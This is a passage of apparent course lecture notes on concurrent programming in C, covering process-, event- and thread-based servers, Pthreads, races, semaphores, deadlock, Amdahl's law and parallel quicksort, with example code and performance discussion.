- Feature known as "TCP listen backlog"
Call to rio_writen returns
- Server side TCP manager buffers input data
Call to rio_readlineb blocks
- Server hasn't written anything for it to read yet

Solution: use concurrent servers instead
- Concurrent servers use multiple concurrent flows to serve multiple clients at the same time

Approaches for Writing Concurrent Servers

Process-based
- Kernel automatically interleaves multiple logical flows
- Each flow has its own private address space
Event-based
- Programmer manually interleaves multiple logical flows
- All flows share the same address space
- Uses technique called I/O multiplexing
Thread-based
- Kernel automatically interleaves multiple logical flows
- Each flow shares the same address space
- Hybrid of of process-based and event-based

Process-based Servers

Spawn separate process for each client

Process-Based Concurrent Echo Server

void sigchld_handler(int sig) {
  /* Reap all zombie children */
  while (waitpid(-1, 0, WNOHANG) > 0)
    ;
  return;
}

int main(int argc, char **argv) {
  int listenfd, connfd;
  socklen_t clientlen;
  struct sockaddr_storage clientaddr;

  signal(SIGCHLD, sigchld_handler);
  listenfd = open_listenfd(argv[1]);
  while (1) {
    clientlen = sizeof(struct sockaddr_storage);
    connfd = accept(listenfd, (SA *)&clientaddr, &clientlen);

    if (fork() == 0) {
      close(listenfd); /* Child closes its listening socket */
      echo(connfd);    /* Child services client */
      close(connfd);   /* Child closes connection with client */
      exit(0);         /* Child exits */
    }
    close(connfd); /* Parent closes connected socket (important!) */
  }
}

Process-based Server Execution Model

Each client handled by independent child process
No shared state between them
Both parent & child have copies of listenfd and connfd
- Parent must close connfd
- Child should close listenfd

Issues with Process-based Servers

Listening server process must reap zombie children to avoid fatal memory leak
Parent process must close its copy of connfd
- Kernel keeps reference count for each socket/open file
- After fork, refcnt(connfd) = 2
- Connection will not be closed until refcnt(connfd) = 0

Pros and Cons of Process-based Servers

Handle multiple connections concurrently
Clean sharing model
- descriptors (no)
- file tables (yes)
- global variables (no)
Simple and straightforward
Additional overhead for process control
Nontrivial to share data between processes
- Requires IPC (interprocess communication) mechanisms
  - FIFO's (named pipes), System V shared memory and semaphores

Event-based Servers

Server maintains set of active connections
- Array of connfd's
Repeat:
- Determine which descriptors (connfd's or listenfd) have pending inputs
  - e.g., using select or epoll functions
  - arrival of pending input is an event
- If listenfd has input, then accept connection and add new connfd to array
- Service all connfd's with pending inputs

I/O Multiplexed Event Processing

Pros and Cons of Event-based Servers

One logical control flow and address space
Can single-step with a debugger
No process or thread control overhead
- Design of choice for high-performance Web servers and search engines
  - E.g., Node.js, Nginx, Tornado
Significantly more complex to code than process-based or thread-based designs
Hard to provide fine-grained concurrency
- E.g., How to deal with partial HTTP request headers
Cannot take advantage of multi-core
- Single thread of control

Thread-based Servers

Very similar to process-based approach
- ...but using threads instead of processes

Traditional View of a Process

Process = Process Context + Code, Data, and Stack

Alternate View of a Process

Process = Thread + Code, Data, and Kernel Context

A Process With Multiple Threads

Multiple threads can be associated with a process
- Each thread has its own logical control flow
- Each thread shares the same code, data, and kernel context
- Each thread has its own stack for local variables
  - but not protected from other threads
- Each thread has its own Thread ID (TID)

Logical View of Threads

Threads associated with process form a pool of peers
- Unlike processes which form a tree hierarchy

Concurrent Threads

Two threads are concurrent if their flows overlap in time
Otherwise, they are sequential
Examples:
- Concurrent: A & B, A & C
- Sequential: B & C

Concurrent Thread Execution

Single Core Processor
- Simulate parallelism by time slicing
Multi Core Processor
- Can have true parallelism

Threads vs. Processes

How threads and processes are similar ?
- Each has its own logical control flow
- Each can run concurrently with others (possibly on different cores)
- Each is context switched
How threads and processes are different ?
- Threads share all code and data (except local stacks)
  - Processes (typically) do not
- Threads are somewhat less expensive than processes
  - Process control (creating and reaping) twice as expensive as thread control
  - Linux numbers:
    - ~20K cycles to create and reap a process
    - ~10K cycles (or less) to create and reap a thread

Posix Threads (Pthreads) Interface

Pthreads: Standard interface for ~60 functions that manipulate threads from C programs
- Creating and reaping threads
  - pthread_create()
  - pthread_join()
- Determining your thread ID
  - pthread_self()
- Terminating threads
  - pthread_cancel()
  - pthread_exit()
  - exit() terminates all threads , ret terminates current thread
- Synchronizing access to shared variables
  - pthread_mutex_init
  - pthread_mutex_[un]lock

The Pthreads "hello, world" Program

void *thread(void *vargp);

int main() {
  pthread_t tid;

  pthread_create(&tid, NULL, thread, NULL);
  pthread_join(tid, NULL);
  exit(0);
}

void *thread(void *vargp) {
  printf("Hello, world!\n");
  return NULL;
}

Thread-Based Concurrent Echo Server

void *thread(void *vargp);

int main(int argc, char **argv) {
  int listenfd, *connfdp;
  socklen_t clientlen;
  struct sockaddr_storage clientaddr;
  pthread_t tid;

  listenfd = open_listenfd(argv[1]);
  while (1) {
    clientlen = sizeof(struct sockaddr_storage);
    connfdp = malloc(sizeof(int));
    *connfdp = accept(listenfd, (SA *)&clientaddr, &clientlen);
    pthread_create(&tid, NULL, thread, connfdp);
  }
}

void *thread(void *vargp) {
  int connfd = *((int *)vargp);

  pthread_detach(pthread_self());
  free(vargp);
  echo(connfd);
  close(connfd);
  return NULL;
}

malloc of connected descriptor necessary to avoid deadly race (but still have subtle problem)
Run thread in detached mode
- Runs independently of other threads
- Reaped automatically (by kernel) when it terminates
Free storage allocated to hold connfd
Close connfd (important!)

Thread-based Server Execution Model

Each client handled by individual peer thread
Threads share all process state except TID
Each thread has a separate stack for local variables

Issues With Thread-Based Servers

Must run "detached" to avoid memory leak
- At any point in time, a thread is either joinable or detached
- Joinable thread can be reaped and killed by other threads
  - must be reaped (with pthread_join) to free memory resources
- Detached thread cannot be reaped or killed by other threads
  - resources are automatically reaped on termination
- Default state is joinable
  - use pthread_detach(pthread_self()) to make detached
Must be careful to avoid unintended sharing
- For example, passing pointer to main thread's stack
  - pthread_create(&tid, NULL, thread, (void *)&connfd);
- All functions called by a thread must be thread-safe

Pros and Cons of Thread-Based Designs

Easy to share data structures between threads
- e.g., logging information, file cache
Threads are more efficient than processes
Unintentional sharing can introduce subtle and hard-to-reproduce errors !
- The ease with which data can be shared is both the greatest strength and the greatest weakness of threads
- Hard to know which data shared & which private
- Hard to detect by testing
  - Probability of bad race outcome very low
  - But nonzero !

Synchronization

Shared Variables in Threaded C Programs

Question: Which variables in a threaded C program are shared ?
- The answer is not as simple as "global variables are shared" and "stack variables are private"
Def: A variable x is shared if and only if multiple threads reference some instance of x
Requires answers to the following questions:
- What is the memory model for threads ?
- How are instances of variables mapped to memory ?
- How many threads might reference each of these instances ?

Threads Memory Model

Conceptual model:
- Multiple threads run within the context of a single process
- Each thread has its own separate thread context
  - Thread ID, stack, stack pointer, PC, condition codes, and GP registers
- All threads share the remaining process context
  - Code, data, heap, and shared library segments of the process virtual address space
  - Open files and installed handlers
Operationally, this model is not strictly enforced:
- Register values are truly separate and protected, but...
- Any thread can read and write the stack of any other thread

:::caution The mismatch between the conceptual and operation model is a source of confusion and errors. :::

Example Program to Illustrate Sharing

void *thread(void *vargp);

char **ptr; /* global var */

int main() {
  long i;
  pthread_t tid;
  char *msgs[2] = {
    "Hello from foo",
    "Hello from bar"
  };

  ptr = msgs;
  for (i = 0; i < 2; i++)
    pthread_create(&tid, NULL, thread, (void *)i);
  pthread_exit(NULL);
}

void *thread(void *vargp) {
  long myid = (long)vargp;
  static int cnt = 0;

  printf("[%ld]: %s (cnt=%d)\n", myid, ptr[myid], ++cnt);
  return NULL;
}

Peer threads reference main thread's stack indirectly through global ptr variable
ptr, cnt, and msgs are shared, i and myid are not shared

Example for Improper Synchronizing Threads

void *thread(void *vargp);

/* Global shared variable */
volatile long cnt = 0;

int main(int argc, char **argv) {
  long niters;
  pthread_t tid1, tid2;

  niters = atoi(argv[1]);
  pthread_create(&tid1, NULL, thread, &niters);
  pthread_create(&tid2, NULL, thread, &niters);
  pthread_join(tid1, NULL);
  pthread_join(tid2, NULL);

  /* Check result */
  if (cnt != (2 * niters))
    printf("BOOM! cnt=%ld\n", cnt);
  else
    printf("OK cnt=%ld\n", cnt);
  exit(0);
}

void *thread(void *vargp) {
  long i, niters = *((long *)vargp);
  for (i = 0; i < niters; i++)
    cnt++;
  return NULL;
}

linux> ./badcnt 10000
OK cnt=20000
linux> ./badcnt 10000
BOOM! cnt=13051
linux>

cnt should equal 20,000. What went wrong ?

Assembly Code for Counter Loop

Concurrent Execution

Key idea: In general, any sequentially consistent interleaving is possible, but some give an unexpected result !
- $I_{i}$ denotes that thread $i$ executes instruction $I$
- $%rdx_{i}$ is the content of $%rdx$ in thread $i$'s context

Incorrect ordering: two threads increment the counter, but the result is 1 instead of 2

And the following ordering is still wrong

We can analyze the behavior using a progress graph

Progress Graphs

A progress graph depicts the discrete execution state space of concurrent threads
Each axis corresponds to the sequential order of instructions in a thread
Each point corresponds to a possible execution state $( I_{1} ,I_{2})$
- E.g., $( L_{1} ,S_{2})$ denotes state where thread 1 has completed $L_{1}$ and thread 2 has completed $S_{2}$

Trajectories in Progress Graphs

A trajectory is a sequence of legal state transitions that describes one possible concurrent execution of the threads

Critical Sections and Unsafe Regions

$L$, $U$, and $S$ form a critical section with respect to the shared variable cnt
Instructions in critical sections (write some shared variable) should not be interleaved
Sets of states where such interleaving occurs form unsafe regions
Def: A trajectory is safe iff it does not enter any unsafe region
Claim: A trajectory is correct (write cnt) iff it is safe

Enforcing Mutual Exclusion

Question: How can we guarantee a safe trajectory ?
Answer: We must synchronize the execution of the threads so that they can never have an unsafe trajectory
- i.e., need to guarantee mutually exclusive access for each critical section
Classic solution:
- Semaphores (Edsger Dijkstra)
Other approaches:
- Mutex and condition variables (Pthreads)
- Monitors (Java)

Semaphores

Semaphore: non-negative global integer synchronization variable. Manipulated by P and V operations (P and V correspond to the dutch words Proberen and Verhogen respectively)
P(s)
- If s is nonzero, then decrement s by 1 and return immediately
  - Test and decrement operations occur atomically (indivisibly)
- If s is zero, then suspend thread until s becomes nonzero and the thread is restarted by a V operation
- After restarting, the P operation decrements s and returns control to the caller
V(s)
- Increment s by 1
  - Increment operation occurs atomically
- If there are any threads blocked in a P operation waiting for s to become non-zero, then restart exactly one of those threads, which then completes its P operation by decrementing s
Semaphore invariant: $s\geqslant 0$

Using Semaphores for Mutual Exclusion

#include <semaphore.h>

int sem_init(sem_t *s, 0, unsigned int val); /* s = val */
int sem_wait(sem_t *s); /* P(s) */
int sem_post(sem_t *s); /* V(s) */

Basic idea:
- Associate a unique semaphore mutex, initially 1, with each shared variable (or related set of shared variables)
- Surround corresponding critical sections with P(mutex) and V(mutex) operations
Terminology:
- Binary semaphore: semaphore whose value is always 0 or 1
- Mutex: binary semaphore used for mutual exclusion
  - P operation: "locking" the mutex
  - V operation: "unlocking" or "releasing" the mutex
  - "Holding" a mutex: locked and not yet unlocked
- Counting semaphore: used as a counter for set of available resources

Fix for Improper Synchronizing Threads

Define and initialize a mutex for the shared variable cnt:

volatile long cnt = 0;  /* Counter */
sem_t mutex;            /* Semaphore that protects cnt */
sem_init(&mutex, 0, 1); /* mutex = 1 */

Surround critical section with P and V:

for (i = 0; i < niters; i++) {
  sem_wait(&mutex);
  cnt++;
  sem_post(&mutex);
}

:::warning Its orders of magnitude slower than improper one. :::

Why Mutexes Work

Provide mutually exclusive access to shared variable by surrounding critical section with P and V operations on semaphore s (initially set to 1)
Semaphore invariant creates a forbidden region that encloses unsafe region and that cannot be entered by any trajectory

Using Semaphores to Coordinate Access to Shared Resources

Basic idea: Thread uses a semaphore operation to notify another thread that some condition has become true
- Use counting semaphores to keep track of resource state and to notify other threads
- Use mutex to protect access to resource
Two classic examples:
- The Producer-Consumer Problem
- The Readers-Writers Problem

Producer-Consumer Problem

Common synchronization pattern:
- Producer waits for empty slot, inserts item in buffer, and notifies consumer
- Consumer waits for item, removes it from buffer, and notifies producer
Examples:
- Multimedia processing:
  - Producer creates MPEG video frames, consumer renders them
- Event-driven graphical user interfaces
  - Producer detects mouse clicks, mouse movements, and keyboard hits and inserts corresponding events in buffer
  - Consumer retrieves events from buffer and paints the display

Producer-Consumer on an n-element Buffer

Requires a mutex and two counting semaphores:
- mutex: enforces mutually exclusive access to the buffer
- slots: counts the available slots in the buffer
- items: counts the available items in the buffer
Implemented using a shared circular (ring) buffer package called sbuf

sbuf Package

typedef struct {
  int *buf;    /* Buffer array */
  int n;       /* Maximum number of slots */
  int front;   /* buf[(front+1)%n] is first item */
  int rear;    /* buf[rear%n] is last item */
  sem_t mutex; /* Protects accesses to buf */
  sem_t slots; /* Counts available slots */
  sem_t items; /* Counts available items */
} sbuf_t;

void sbuf_init(sbuf_t *sp, int n);
void sbuf_deinit(sbuf_t *sp);
void sbuf_insert(sbuf_t *sp, int item);
int sbuf_remove(sbuf_t *sp);

/* Create an empty, bounded, shared FIFO buffer with n slots */
void sbuf_init(sbuf_t *sp, int n) {
  sp->buf = calloc(n, sizeof(int));
  sp->n = n;                  /* Buffer holds max of n items */
  sp->front = sp->rear = 0;   /* Empty buffer iff front == rear */
  sem_init(&sp->mutex, 0, 1); /* Binary semaphore for locking */
  sem_init(&sp->slots, 0, n); /* Initially, buf has n empty slots */
  sem_init(&sp->items, 0, 0); /* Initially, buf has 0 items */
}

/* Clean up buffer sp */
void sbuf_deinit(sbuf_t *sp) {
  free(sp->buf);
}

/* Insert item onto the rear of shared buffer sp */
void sbuf_insert(sbuf_t *sp, int item) {
  P(&sp->slots);                        /* Wait for available slot */
  P(&sp->mutex);                        /* Lock the buffer */
  sp->buf[(++sp->rear)%(sp->n)] = item; /* Insert the item */
  V(&sp->mutex);                        /* Unlock the buffer */
  V(&sp->items);                        /* Announce available item */
}

/* Remove and return the first item from buffer sp */
int sbuf_remove(sbuf_t *sp) {
  int item;
  P(&sp->items);                         /* Wait for available item */
  P(&sp->mutex);                         /* Lock the buffer */
  item = sp->buf[(++sp->front)%(sp->n)]; /* Remove the item */
  V(&sp->mutex);                         /* Unlock the buffer */
  V(&sp->slots);                         /* Announce available slot */
  return item;
}

Readers-Writers Problem

Generalization of the mutual exclusion problem
Problem statement:
- Reader threads only read the object
- Writer threads modify the object
- Writers must have exclusive access to the object
- Unlimited number of readers can access the object
Occurs frequently in real systems:
- Online airline reservation system
- Multithreaded caching Web proxy

Variants of Readers-Writers

First readers-writers problem (favors readers)
- No reader should be kept waiting unless a writer has already been granted permission to use the object
- A reader that arrives after a waiting writer gets priority over the writer
Second readers-writers problem (favors writers)
- Once a writer is ready to write, it performs its write as soon as possible
- A reader that arrives after a writer must wait, even if the writer is also waiting
Starvation (where a thread waits indefinitely) is possible in both cases

Solution to First Readers-Writers Problem

int readcnt; /* Initially = 0 */
sem_t mutex, w; /* Initially = 1 */

void reader(void) {
  while (1) {
    P(&mutex);
    readcnt++;
    if (readcnt == 1) /* First in */
      P(&w);
    V(&mutex);

    /* Critical section */
    /* Reading happens */

    P(&mutex);
    readcnt--;
    if (readcnt == 0) /* Last out */
      V(&w);
    V(&mutex);
  }
}

void writer(void) {
  while (1) {
    P(&w);

    /* Critical section */
    /* Writing happens */

    V(&w);
  }
}

Putting It All Together: Prethreaded Concurrent Server

Prethreaded Concurrent Server

void *thread(void *vargp);

sbuf_t sbuf; /* Shared buffer of connected descriptors */

int main(int argc, char **argv) {
  int i, listenfd, connfd;
  socklen_t clientlen;
  struct sockaddr_storage clientaddr;
  pthread_t tid;

  listenfd = open_listenfd(argv[1]);
  sbuf_init(&sbuf, SBUFSIZE);
  for (i = 0; i < NTHREADS; i++) /* Create worker threads */
    pthread_create(&tid, NULL, thread, NULL);
  while (1) {
    clientlen = sizeof(struct sockaddr_storage);
    connfd = accept(listenfd, (SA *)&clientaddr, &clientlen);
    sbuf_insert(&sbuf, connfd); /* Insert connfd in buffer */
  }
}

void *thread(void *vargp) {
  pthread_detach(pthread_self());
  while (1) {
    int connfd = sbuf_remove(&sbuf); /* Remove connfd from buf */
    echo_cnt(connfd);                /* Service client */
    close(connfd);
  }
}

/* echo_cnt initialization routine */
static int byte_cnt; /* Byte counter */
static sem_t mutex;  /* and the mutex that protects it */

static void init_echo_cnt(void) {
  sem_init(&mutex, 0, 1);
  byte_cnt = 0;
}

/* Worker thread service routine */
void echo_cnt(int connfd) {
  int n;
  char buf[MAXLINE];
  rio_t rio;
  static pthread_once_t once = PTHREAD_ONCE_INIT;

  pthread_once(&once, init_echo_cnt);
  rio_readinitb(&rio, connfd);
  while((n = rio_readlineb(&rio, buf, MAXLINE)) != 0) {
    P(&mutex);
    byte_cnt += n;
    printf("thread %d received %d (%d total) bytes on fd %d\n", (int)pthread_self(), n, byte_cnt, connfd);
    V(&mutex);
    rio_writen(connfd, buf, n);
  }
}

Crucial concept: Thread Safety

Functions called from a thread must be thread‐safe
Def: A function is thread-safe iff it will always produce correct results when called repeatedly from multiple concurrent threads
Classes of thread-unsafe functions:
- Class 1: Functions that do not protect shared variables
- Class 2: Functions that keep state across multiple invocations
- Class 3: Functions that return a pointer to a static variable
- Class 4: Functions that call thread-unsafe functions

Thread-Unsafe Functions (Class 1)

Failing to protect shared variables
- Fix: Use P and V semaphore operations
- Issue: Synchronization operations will slow down code

Thread-Unsafe Functions (Class 2)

Relying on persistent state across multiple function invocations
- Example: Random number generator that relies on static state

static unsigned int next = 1;

/* rand: return pseudo-random integer on 0..32767 */
int rand(void) {
  next = next*1103515245 + 12345;
  return (unsigned int)(next/65536) % 32768;
}

/* srand: set seed for rand() */
void srand(unsigned int seed) {
  next = seed;
}

Thread-Safe Random Number Generator

Pass state as part of argument
- and, thereby, eliminate global state

/* rand_r - return pseudo-random integer on 0..32767 */

int rand_r(int *nextp) {
  *nextp = *nextp * 1103515245 + 12345;
  return (unsigned int)(*nextp/65536) % 32768;
}

Consequence: programmer using rand_r must maintain seed

Thread-Unsafe Functions (Class 3)

Returning a pointer to a static variable
Fix 1. Rewrite function so caller passes address of variable to store result
- Requires changes in caller and callee
Fix 2. Lock-and‐copy
- Requires simple changes in caller (and none in callee)
- However, caller must free memory

/* lock-and-copy version */
char *ctime_ts(const time_t *timep, char *privatep) {
  char *sharedp;

  P(&mutex);
  sharedp = ctime(timep);
  strcpy(privatep, sharedp);
  V(&mutex);
  return privatep;
}

Thread-Unsafe Functions (Class 4)

Calling thread-unsafe functions
- Calling one thread-unsafe function makes the entire function that calls it thread-unsafe
- Fix: Modify the function so it calls only thread-safe functions

Reentrant Functions

Def: A function is reentrant iff it accesses no shared variables when called by multiple threads
- Important subset of thread-safe functions
  - Require no synchronization operations
  - Only way to make a Class 2 function thread-safe is to make it reetnrant (e.g., rand_r)

Thread-Safe Library Functions

All functions in the Standard C Library (at the back of your K&R text) are thread-safe
- Examples: malloc, free, printf, scanf
Most Unix system calls are thread-safe, with a few exceptions:

Thread-unsafe function	Class	Reentrant version
`asctime`	3	`asctime_r`
`ctime`	3	`ctime_r`
`gethostbyaddr`	3	`gethostbyaddr_r`
`gethostbyname`	3	`gethostbyname_r`
`inet_ntoa`	3	(none)
`localtime`	3	`localtime_r`
`rand`	2	`rand_r`

Races

A race occurs when correctness of the program depends on one thread reaching point x before another thread reaches point y

void *thread(void *vargp);

/* A threaded program with a race */
int main() {
  pthread_t tid[N];
  int i;

  for (i = 0; i < N; i++)
    pthread_create(&tid[i], NULL, thread, &i);
  for (i = 0; i < N; i++)
    pthread_join(tid[i], NULL);
  exit(0);
}

/* Thread routine */
void *thread(void *vargp) {
  int myid = *((int *)vargp);
  printf("Hello from thread %d\n", myid);
  return NULL;
}

Race Illustration

for (i = 0; i < N; i++)
  pthread_create(&tid[i], NULL, thread, &i);

Race between increment of i in main thread and deref of vargp in peer thread:
- If deref happens while i = 0, then OK
- Otherwise, peer thread gets wrong id value

Could this race really occur ?

Main thread:

int i;
for (i = 0; i < 100; i++) {
  pthread_create(&tid, NULL, thread, &i);
}

Peer thread:

void *thread(void *vargp) {
  pthread_detach(pthread_self());
  int i = *((int *)vargp);
  save_value(i);
  return NULL;
}

Race Test
- If no race, then each thread would get different value of i
- Set of saved values would consist of one copy each of 0 through 99

Experimental Results

Race Elimination

/* Threaded program without the race */
int main() {
  pthread_t tid[N];
  int i, *ptr;

  for (i = 0; i < N; i++) {
    ptr = malloc(sizeof(int));
    *ptr = i;
    pthread_create(&tid[i], NULL, thread, ptr);
  }
  for (i = 0; i < N; i++)
    pthread_join(tid[i], NULL);
  exit(0);
}

/* Thread routine */
void *thread(void *vargp) {
  int myid = *((int *)vargp);
  free(vargp);
  printf("Hello from thread %d\n", myid);
  return NULL;
}

Deadlock

Def: A process is deadlocked iff it is waiting for a condition that will never be true
Typical Scenario:
- Processes 1 and 2 needs two resources (A and B) to proceed
- Process 1 acquires A, waits for B
- Process 2 acquires B, waits for A
- Both will wait forever !

Deadlocking With Semaphores

void *count(void *vargp);

int main() {
  pthread_t tid[2];
  sem_init(&mutex[0], 0, 1); /* mutex[0] = 1 */
  sem_init(&mutex[1], 0, 1); /* mutex[1] = 1 */
  pthread_create(&tid[0], NULL, count, (void*)0);
  pthread_create(&tid[1], NULL, count, (void*)1);
  pthread_join(tid[0], NULL);
  pthread_join(tid[1], NULL);
  printf("cnt=%d\n", cnt);
  exit(0);
}

void *count(void *vargp) {
  int i;
  int id = (int)vargp;
  for (i = 0; i < NITERS; i++) {
    P(&mutex[id]); P(&mutex[1-id]);
    cnt++;
    V(&mutex[id]); V(&mutex[1-id]);
  }
  return NULL;
}

Deadlock Visualized in Progress Graph

Locking introduces the potential for deadlock
Any trajectory that enters the deadlock region will eventually reach the deadlock state, waiting for either $S_{0}$ or $S_{1}$ to become nonzero
Other trajectories luck out and skirt the deadlock region
Unfortunate fact: deadlock is often nondeterministic (race)

Avoiding Deadlock: Acquire shared resources in same order

int main() {
  pthread_t tid[2];
  sem_init(&mutex[0], 0, 1); /* mutex[0] = 1 */
  sem_init(&mutex[1], 0, 1); /* mutex[1] = 1 */
  pthread_create(&tid[0], NULL, count, (void*) 0);
  pthread_create(&tid[1], NULL, count, (void*) 1);
  pthread_join(tid[0], NULL);
  pthread_join(tid[1], NULL);
  printf("cnt=%d\n", cnt);
  exit(0);
}

void *count(void *vargp) {
  int i;
  int id = (int) vargp;
  for (i = 0; i < NITERS; i++) {
    P(&mutex[0]); P(&mutex[1]);
    cnt++;
    V(&mutex[id]); V(&mutex[1-id]);
  }
  return NULL;
}

Avoided Deadlock in Progress Graph

No way for trajectory to get stuck
Processes acquire locks in same order
Order in which locks released immaterial

Thread-Level Parallelism

Parallel Computing Hardware
- Multicore
  - Multiple separate processors on single chip
- Hyperthreading
  - Efficient execution of multiple threads on single core

Typical Multicore Processor

Multiple processors operating with coherent view of memory

Out-of-Order Processor Structure

Instruction control dynamically converts program into stream of operations
Operations mapped onto functional units to execute in parallel

Hyperthreading Implementation

Replicate enough instruction control to process K instruction streams
K copies of all registers
Share functional units

Example: Parallel Summation

Sum numbers $0,...,n-1$
- Should add up to $\displaystyle \frac{n( n-1)}{2}$
Partition values $0,...,n-1$ into t ranges
- $\lfloor n/t\rfloor $ values in each range
- Each of t threads processes 1 range
- For simplicity, assume n is a multiple of t

First attempt: psum-mutex

Simplest approach: Threads sum into a global variable protected by a semaphore mutex

void *sum_mutex(void *vargp);

long gsum = 0;          /* Global sum */
long nelems_per_thread; /* Number of elements to sum */
sem_t mutex;            /* Mutex to protect global sum */

int main(int argc, char **argv) {
  long i, nelems, log_nelems, nthreads, myid[MAXTHREADS];
  pthread_t tid[MAXTHREADS];
  /* Get input arguments */
  nthreads = atoi(argv[1]);
  log_nelems = atoi(argv[2]);
  nelems = (1L << log_nelems);
  nelems_per_thread = nelems / nthreads;
  sem_init(&mutex, 0, 1);

  /* Create peer threads and wait for them to finish */
  for (i = 0; i < nthreads; i++) {
    myid[i] = i;
    pthread_create(&tid[i], NULL, sum_mutex, &myid[i]);
  }

  for (i = 0; i < nthreads; i++)
    pthread_join(tid[i], NULL);

  /* Check final answer */
  if (gsum != (nelems * (nelems-1))/2)
    printf("Error: result=%ld\n", gsum);
  exit(0);
}

void *sum_mutex(void *vargp) {
  long myid = *((long *)vargp);          /* Extract thread ID */
  long start = myid * nelems_per_thread; /* Start element index */
  long end = start + nelems_per_thread;  /* End element index */
  long i;

  for (i = start; i < end; i++) {
    P(&mutex);
    gsum += i;
    V(&mutex);
  }
  return NULL;
}

psum-mutex Performance

Shark machine with 8 cores, $n=2^{31}$

Nasty surprise:
- Single thread is very slow
- Gets slower as we use more cores

Next Attempt: psum-array

Peer thread i sums into global array element psum[i]
Main waits for threads to finish, then sums elements of psum
Eliminates need for mutex synchronization

void *sum_array(void *vargp) {
  long myid = *((long *)vargp);          /* Extract thread ID */
  long start = myid * nelems_per_thread; /* Start element index */
  long end = start + nelems_per_thread;  /* End element index */
  long i;

  for (i = start; i < end; i++) {
    psum[myid] += i;
  }
  return NULL;
}

psum-array Performance

Orders of magnitude faster than psum-mutex

Next Attempt: psum-local

Reduce memory references by having peer thread i sum into a local variable (register)

void *sum_local(void *vargp) {
  long myid = *((long *)vargp);          /* Extract thread ID */
  long start = myid * nelems_per_thread; /* Start element index */
  long end = start + nelems_per_thread;  /* End element index */
  long i, sum = 0;

  for (i = start; i < end; i++) {
    sum += i;
  }
  psum[myid] = sum;
  return NULL;
}

psum-local Performance

Significantly faster than psum-array

Characterizing Parallel Program Performance

$p$ processor cores, $T_{k}$ is the running time using $k$ cores
Def. Speedup: $\displaystyle S_{p} =\frac{T_{1}}{T_{p}}$
- $S_{p}$ is relative speedup if $T_{1}$ is running time of parallel version of the code running on 1 core
- $S_{p}$ is absolute speedup if $T_{1}$ is running time of sequential version of code running on 1 core
- Absolute speedup is a much truer measure of the benefits of parallelism
Def. Efficiency: $\displaystyle E_{p} =\frac{S_{p}}{p} =\frac{T_{1}}{pT_{p}}$
- Reported as a percentage in the range $( 0,100]$
- Measures the overhead due to parallelization

Performance of psum-local

Efficiencies OK, not great
Our example is easily parallelizable
Real codes are often much harder to parallelize

Amdahl's Law

Gene Amdahl (Nov. 16, 1922 – Nov. 10, 2015)
Captures the difficulty of using parallelism to speed things up
Overall problem
- $T$ - Total sequential time required
- $p$ - Fraction of total that can be sped up ($0\leqslant p\leqslant 1$)
- $k$ - Speedup factor
Resulting Performance
- $\displaystyle T_{k} =\frac{pT}{k} +( 1-p) \cdot T$
  - Portion which can be sped up runs $k$ times faster
  - Portion which cannot be sped up stays the same
- Least possible running time:
  - $k=\infty $
  - $T_{\infty } =( 1-p) \cdot T$

Amdahl's Law Example

Overall problem
- $T=10$
- $p=0.9$
- $k=9$
Resulting Performance
- $\displaystyle T_{9} =0.9\cdot \frac{10}{9} +0.1\cdot 10=1.0+1.0=2.0$
- Least possible running time:
  - $T_{\infty } =0.1\cdot 10.0=1.0$

A More Substantial Example: Sort

Sort set of $N$ random numbers
Multiple possible algorithms
- Use parallel version of quicksort
Sequential quicksort of set of values $X$
- Choose "pivot" $p$ from $X$
- Rearrange $X$ into
  - $L$: Values $\leqslant p$
  - $R$: Values $\geqslant p$
- Recursively sort $L$ to get $\displaystyle L^{\prime }$
- Recursively sort $R$ to get $\displaystyle R^{\prime }$
- Return $\displaystyle L^{\prime } :p:R^{\prime }$

Sequential Quicksort Visualized

Sequential Quicksort Code

void qsort_serial(data_t *base, size_t nele) {
  if (nele <= 1)
    return;
  if (nele == 2) {
    if (base[0] > base[1])
      swap(base, base+1);
    return;
  }

  /* Partition returns index of pivot */
  size_t m = partition(base, nele);
  if (m > 1)
    qsort_serial(base, m);
  if (nele-1 > m+1)
    qsort_serial(base+m+1, nele-m-1);
}

Sort nele elements starting at base
- Recursively sort $L$ or $R$ if has more than one element

Parallel Quicksort

Parallel quicksort of set of values $X$
- If $N\leqslant Nthresh$, do sequential quicksort
- Else
  - Choose "pivot" $p$ from $X$
  - Rearrange $X$ into
    - $L$: Values $\leqslant p$
    - $R$: Values $\geqslant p$
  - Recursively spawn separate threads
    - Sort $L$ to get $\displaystyle L^{\prime }$
    - Sort $R$ to get $\displaystyle R^{\prime }$
- Return $\displaystyle L^{\prime } :p:R^{\prime }$

Parallel Quicksort Visualized

Thread Structure: Sorting Tasks

Task: Sort subrange of data
- Specify as:
  - base: Starting address
  - nele: Number of elements in subrange
Run as separate thread

Small Sort Task Operation

Sort subrange using serial quicksort

Large Sort Task Operation

Top-Level Function (Simplified)

void tqsort(data_t *base, size_t nele) {
  init_task(nele);
  global_base = base;
  global_end = global_base + nele - 1;
  task_queue_ptr tq = new_task_queue();
  tqsort_helper(base, nele, tq);
  join_tasks(tq);
  free_task_queue(tq);
}

Sets up data structures
Calls recursive sort routine
Keeps joining threads until none left
Frees data structures

Recursive sort routine (Simplified)

/* Multi-threaded quicksort */
static void tqsort_helper(data_t *base, size_t nele, task_queue_ptr tq) {
  if (nele <= nele_max_sort_serial) {
    /* Use sequential sort */
    qsort_serial(base, nele);
    return;
  }
  sort_task_t *t = new_task(base, nele, tq);
  spawn_task(tq, sort_thread, (void *) t);
}

Small partition: Sort serially
Large partition: Spawn new sort task

Sort task thread (Simplified)

/* Thread routine for many-threaded quicksort */
static void *sort_thread(void *vargp) {
  sort_task_t *t = (sort_task_t *) vargp;
  data_t *base = t->base;
  size_t nele = t->nele;
  task_queue_ptr tq = t->tq;
  free(vargp);
  size_t m = partition(base, nele);
  if (m > 1)
    tqsort_helper(base, m, tq);
  if (nele-1 > m+1)
    tqsort_helper(base+m+1, nele-m-1, tq);
  return NULL;
}

Get task parameters
Perform partitioning step
Call recursive sort routine on each partition

Parallel Quicksort Performance

Serial fraction: Fraction of input at which do serial sort
Sort $2^{27}$ (134,217,728) random values
Best speedup = 6.84X
Good performance over wide range of fraction values
- F too small: Not enough parallelism
- F too large: Thread overhead + run out of thread memory

Amdahl's Law & Parallel Quicksort

Sequential bottleneck
- Top-level partition: No speedup
- Second level: $\leqslant 2X$ speedup
- $k^{th}$ level: $\leqslant 2^{k-1} X$ speedup
Implications
- Good performance for small-scale parallelism
- Would need to parallelize partitioning step to get large-scale parallelism
